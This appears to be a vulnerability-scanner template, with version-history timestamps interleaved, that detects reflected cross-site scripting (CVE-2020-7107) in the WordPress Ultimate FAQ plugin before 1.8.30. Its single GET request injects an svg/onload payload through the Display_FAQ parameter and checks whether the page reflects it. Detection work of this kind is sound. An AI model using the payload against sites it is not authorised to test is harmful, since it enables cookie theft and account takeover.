2023-03-18 22:07:09 +00:00
id : CVE-2020-7107
info :
2023-03-28 18:55:21 +00:00
name : WordPress Ultimate FAQ <1.8.30 - Cross-Site Scripting
2023-03-18 22:07:09 +00:00
author : theamanrawat
severity : medium
description : |
2023-03-28 18:55:21 +00:00
WordPress Ultimate FAQ plugin before 1.8.30 is susceptible to cross-site scripting via Display_FAQ to Shortcodes/DisplayFAQs.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2023-03-18 22:07:09 +00:00
reference :
- https://wpscan.com/vulnerability/5e1cefd5-5369-44bd-aef7-2a382c8d8e33
- https://wordpress.org/plugins/ultimate-faqs/
2023-03-20 07:05:15 +00:00
- https://plugins.trac.wordpress.org/changeset/2222959/ultimate-faqs/tags/1.8.30/Shortcodes/DisplayFAQs.php
2023-03-28 18:55:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-7107
2023-07-11 19:49:27 +00:00
- https://wordpress.org/plugins/ultimate-faqs/#developers
2023-03-28 18:55:21 +00:00
remediation : Fixed in version 1.8.30.
2023-03-18 22:07:09 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2020-7107
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00517
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:etoilewebdesign:ultimate_faq:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.73771
2023-03-18 22:07:09 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : etoilewebdesign
product : ultimate_faq
2023-03-20 07:05:15 +00:00
tags : ultimate-faqs,wpscan,cve,cve2020,xss,wordpress,wp-plugin,wp
2023-03-18 22:07:09 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-18 22:07:09 +00:00
- method : GET
path :
- "{{BaseURL}}/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "'</script><svg/onload=alert(document.cookie)>"
- "var Display_FAQ_ID ="
condition : and
- type : word
part : header
words :
- "text/html"
- type : status
status :
- 200